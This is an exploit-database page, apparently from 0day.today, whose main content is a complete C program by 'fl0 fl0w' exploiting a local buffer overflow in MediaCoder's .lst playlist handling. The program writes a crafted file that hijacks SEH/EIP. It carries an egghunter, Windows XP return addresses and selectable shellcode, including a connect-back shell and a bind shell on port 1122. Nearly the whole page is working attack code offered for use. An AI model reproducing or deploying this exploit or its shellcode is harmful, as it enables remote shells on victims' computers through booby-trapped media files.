0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MediaCoder (.lst) file local Buffer Overflow Exploit
[====================================================
MediaCoder (.lst) file local Buffer Overflow Exploit
====================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 I'm fl0 fl0w member from Inj3ct0r Team 1
1 ###################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Discovered By: fl0 fl0w
#include<stdio.h>
#include<getopt.h>
#include<string.h>
#include<windows.h>
#define PAUSE() getchar()
#define R return
#define V void
#define CONST const
#define STATIC static
#define SIZE(a) strlen(a)
#define FOR(i,a,b) for(i=a;i<b;++i)
#define IFeq(a,b) if(a==b)
#define IFless(a,b) if(a<b)
#define IFgreat(a,b) if(a>b)
#define IFnot(a) if(!a)
#define fisier FILE
#define nul NULL
#define SPLIT(a) exit(a)
#define VER "0.7.3 build 4612 PSP edition"
#define POCNAME "MediaCoder .lst file local buffer overflow exploit"
#define AUTHOR "fl0 fl0w"
#define IFn(a,b) if(a!=b)
#define String_lengh 0x2FC
#define EIP_OFFSET 0x300
#define NOP_OFFSET 0x304
#define EGGHUNTER_OFFSET 0x318
#define JUNK_OFFSET 0x34A
#define TAG_OFFSET 0x81C
#define SHELL_OFFSET 0x824
#define NSEH_OFFSET 0x2FC
#define STOP break
#define NOP "\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90" \
"\x90\x90\x90\x90\x90"
typedef char i8;
typedef short i16;
typedef int i32;
enum {True=1,False=0,Error=-1};
size_t len(const i8*);
i32 fwt(CONST V*,i32,i32,fisier*);
i32 mcpy(V*,CONST V*,i32);
i32 mset(V*,i32,i32);
i32 prinf(fisier*,CONST i8*,i8*);
i32 strcp(CONST i8*,CONST i8*);
V print(i8*);
DWORD getFsize(fisier*,i8*);
V gen_random(i8*,CONST i32);
DWORD SearchStream(CONST i8*,size_t,CONST i8*,size_t);
DWORD Findpopopret(V);
i32 stncmp(CONST i8*,CONST i8*,i32);
V help();
i32 closef(fisier*);
fisier* openf(CONST i8*,CONST i8*,fisier*);
char BeeP[]={
"\x55\x89\xE5\x83\xEC\x18\xC7\x45\xFC"
"\x6F\x7A\x83\x7C"
"\xC7\x44\x24\x04\xD0\x07\x00\x00\xC7\x04\x24"
"\x01\x0E\x00\x00\x8B\x45\xFC\xFF\xD0\xC9\xC3"
};
char ConnectBack[]={ /*ConnectBack 127.0.0.1 port 2010*/
"\x31\xc9\xbd\xcb\xe3\xbf\xf7\xb1\x4f\xd9\xc8\xd9\x74\x24\xf4"
"\x5f\x31\x6f\x10\x83\xc7\x04\x03\x6f\x0c\x29\x16\x43\x1f\x24"
"\xd9\xbc\xe0\x56\x53\x59\xd1\x44\x07\x29\x40\x58\x43\x7f\x69"
"\x13\x01\x94\xfa\x51\x8e\x9b\x4b\xdf\xe8\x92\x4c\xee\x34\x78"
"\x8e\x71\xc9\x83\xc3\x51\xf0\x4b\x16\x90\x35\xb1\xd9\xc0\xee"
"\xbd\x48\xf4\x9b\x80\x50\xf5\x4b\x8f\xe9\x8d\xee\x50\x9d\x27"
"\xf0\x80\x0e\x3c\xba\x38\x24\x1a\x1b\x38\xe9\x79\x67\x73\x86"
"\x49\x13\x82\x4e\x80\xdc\xb4\xae\x4e\xe3\x78\x23\x8f\x23\xbe"
"\xdc\xfa\x5f\xbc\x61\xfc\x9b\xbe\xbd\x89\x39\x18\x35\x29\x9a"
"\x98\x9a\xaf\x69\x96\x57\xa4\x36\xbb\x66\x69\x4d\xc7\xe3\x8c"
"\x82\x41\xb7\xaa\x06\x09\x63\xd3\x1f\xf7\xc2\xec\x40\x5f\xba"
"\x48\x0a\x72\xaf\xea\x51\x1b\x1c\xc0\x69\xdb\x0a\x53\x19\xe9"
"\x95\xcf\xb5\x41\x5d\xc9\x42\xa5\x74\xad\xdd\x58\x77\xcd\xf4"
"\x9e\x23\x9d\x6e\x36\x4c\x76\x6f\xb7\x99\xd8\x3f\x17\x72\x98"
"\xef\xd7\x22\x70\xfa\xd7\x1d\x60\x05\x32\x28\xa7\x92\xc2\x2b"
"\x27\x62\x55\x2e\x27\x63\x7f\xa7\xc1\x01\x6f\xee\x5a\xbe\x16"
"\xab\x10\x5f\xd6\x61\xb0\xfc\x45\xee\x40\x8a\x75\xb9\x17\xdb"
"\x48\xb0\xfd\xf1\xf3\x6a\xe3\x0b\x65\x54\xa7\xd7\x56\x5b\x26"
"\x95\xe3\x7f\x38\x63\xeb\x3b\x6c\x3b\xba\x95\xda\xfd\x14\x54"
"\xb4\x57\xca\x3e\x50\x21\x20\x81\x26\x2e\x6d\x77\xc6\x9f\xd8"
"\xce\xf9\x10\x8d\xc6\x82\x4c\x2d\x28\x59\xd5\x5d\x63\xc3\x7c"
"\xf6\x2a\x96\x3c\x9b\xcc\x4d\x02\xa2\x4e\x67\xfb\x51\x4e\x02"
"\xfe\x1e\xc8\xff\x72\x0e\xbd\xff\x21\x2f\x94"
};
char Bindport1122[]={
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x37"
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"
"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
"\x4f\x55\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
"\x49\x38\x4e\x36\x46\x52\x4e\x41\x41\x56\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x38\x43\x34\x42\x53\x4b\x38\x42\x44\x4e\x30\x4b\x48"
"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x30\x50\x45\x4a\x46"
"\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57"
"\x44\x43\x4f\x45\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
"\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44"
"\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x46\x50"
"\x44\x36\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x55\x4f\x4f\x48\x4d"
"\x42\x55\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x35"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x56"
"\x4d\x36\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x54\x4e\x52"
"\x43\x39\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
"\x48\x4d\x4b\x45\x47\x55\x44\x45\x41\x45\x41\x35\x41\x45\x4c\x56"
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a"
};
i8 Calculator[]={
"\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77\x33\xC0\x50\x68\x63\x61\x6C\x63"
"\x54\x5B\x50\x53\xB9\xC7\x93\xC2\x77\xFF\xD1\xEB\xF7"
};
i8 egghunter[]={/*IsBadReadPtr egghunter 32 bytes*/
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x66\x6C\x30\x77" //fl0w tag
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
};
i8 tag[]={"\x66\x6C\x30\x77"
"\x66\x6C\x30\x77"
};
i32 j,i,x,custom=0,err;
i8 c,shellbuffer[0x3E8],fbuffer[0xF4240],retcode[10];
DWORD ret;
i32 main(i32 argc,i8** argv)
{ ((argc==7)||(argc==8)&&(atoi(argv[4])>0)&&(atoi(argv[6])>0)&&(atoi(argv[4])<6)||(argc==8)&&(atoi(argv[7])==4))?(err=True):(err=Error);
IFeq(err,True){
((strcp(argv[1],"-f")==0)&&(len(argv[1])==2)&&(strcp(argv[3],"-s")==0)&&(len(argv[3])==2)&&(strcp(argv[5],"-t")==0)&&(len(argv[5])==2))?(err=True):(err=Error);
IFeq(err,True){
(atoi(argv[6])==1)?(mcpy(&ret,"\x26\x59\x01\x66",4)):(atoi(argv[6])==2)?(mcpy(&ret,"\xB8\x15\xD1\x72",4)):(atoi(argv[6])==3)?(mcpy(&ret,"\x83\x27\x90\x7C",4)):(atoi(argv[6])==4)?(custom=1):(custom=0);
IFeq(custom,1){
if((strncmp(argv[7],"0x",(sizeof(i8)*2))==0)&&(len(argv[7])==10)){
for(j=(sizeof(char) * 8) - 1; (j >= 0);j--) {
c = *(argv[1] + j + 2);
((c>=48)&&(c<=57)||(c>=65)&&(c<=70)||(c>=97)&&(c<=102))?(err=1):(err=-1);
}
sscanf(argv[7],"%x",&ret);
}
else
print("syntax error 0x not found");
}
}
else
print("syntax error ,target must be in range[1-4]");
}
else {
system("cls");
printf("[#]%s\n[#]Ver %s\n[#]Author %s\n",POCNAME,VER,AUTHOR);
help();
}
switch(atoi(argv[4])){
case 1: mcpy(shellbuffer,ConnectBack,SIZE(ConnectBack));
STOP;
case 2: mcpy(shellbuffer,Bindport1122,0x2C5);
STOP;
case 3: mcpy(shellbuffer,Calculator,0x20);
STOP;
case 4: mcpy(shellbuffer,BeeP,0x13);
STOP;
}
gen_random(fbuffer,String_lengh);
mcpy(fbuffer+NSEH_OFFSET,"\xEB\x06\x90\x90",4);
mcpy(fbuffer+EIP_OFFSET,&ret,4);
mcpy(fbuffer+NOP_OFFSET,NOP,0x14);
mcpy(fbuffer+EGGHUNTER_OFFSET,egghunter,0x20);
mset(fbuffer+JUNK_OFFSET,0x58,0x4D2);
mcpy(fbuffer+TAG_OFFSET,tag,8);
mcpy(fbuffer+SHELL_OFFSET,shellbuffer,len(shellbuffer));
fisier* f=fopen(argv[2],"wb");
fwt(fbuffer,1,0x824+len(shellbuffer),f);
closef(f);
PAUSE();
print("DONE!");
printf("[!]File is %d bytes",getFsize(f,argv[2]));
R 0;
}
size_t len(CONST i8* str)
{ CONST i8* aux=str;
R SIZE(aux);
}
i32 fwt(CONST V* ptr,i32 sz,i32 elem,fisier* fname)
{ CONST V* p=ptr;
R fwrite(p,sz,elem,fname);
}
i32 mcpy(V* dest,CONST V* source,i32 len)
{ V* D=dest;
CONST* S=source;
len=SIZE(source);
memcpy(D,S,len);
R len;
}
i32 mset(V* ptr,i32 val,i32 len)
{ V* f=ptr;
i32 valoare=val;
memset(f,val,len);
R len;
}
i32 prinf(fisier* str,CONST i8* format,i8* buffer)
{ fisier* f=str;
CONST i8* fm=format;
R fprintf(f,fm,buffer);
}
i32 strcp(CONST i8* str1,CONST i8* str2)
{ CONST i8* s1=str1;
CONST i8* s2=str2;
R strcmp(s1,s2);
}
i32 stncmp(CONST i8* str1,CONST i8* str2,i32 num)
{ CONST i8* s1=str1;
CONST i8* s2=str2;
R strncmp(s1,s2,num);
}
V print(i8* msg)
{
printf("[*]%s\n",msg);
}
V gen_random(i8* s,CONST i32 len)
{ i32 i;
STATIC CONST i8 alphanum[]= {
"0123456789ABCDEFGHIJKLMNOPQRST"
"UVWXYZabcdefghijklmnopqrstuvwxyz"};
FOR(i,0,len)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}
V help()
{ i8 h[]=
"***************************************************************************\n"
"* syntax: [-f<file.m3u>] [-s<shellcode>] [-t<target>] 0xFFFFFFFF *\n"
"* -f filename *\n"
"* -s shellcode to run [1,5] *\n"
"* -t target [1,4] *\n"
"* example: mediac.exe -f vuln.lst -s 2 -t 1 *\n"
"* mediac.exe -f vuln.lst -s 4 0xFFFFFFFF *\n"
"* Shellcode 1.ConnectBack 127.0.0.1 port 2010 *\n"
"* 2.Bindport1122 *\n"
"* 3.Calculator *\n"
"* 4.BeeP *\n"
"* Targets 1.Universal *\n"
"* 2.Windows xp sp2 en kernel32.dll *\n"
"* 3.Windows sp3 en ntdll.dll *\n"
"* 4.Windows xp sp1 en *\n"
"***************************************************************************\n";
printf("%s",h);}
DWORD getFsize(fisier* g,i8* gname)
{ DWORD s;
g=fopen(gname,"rb");
IFeq(g,NULL)
{
print("File error at reading");
exit(0);
}
fseek(g,0,SEEK_END);
s=ftell(g);
R s;}
i32 closef(fisier* stream)
{ fisier* f=stream;
R fclose(f);
}
# 0day.today [2024-11-14] #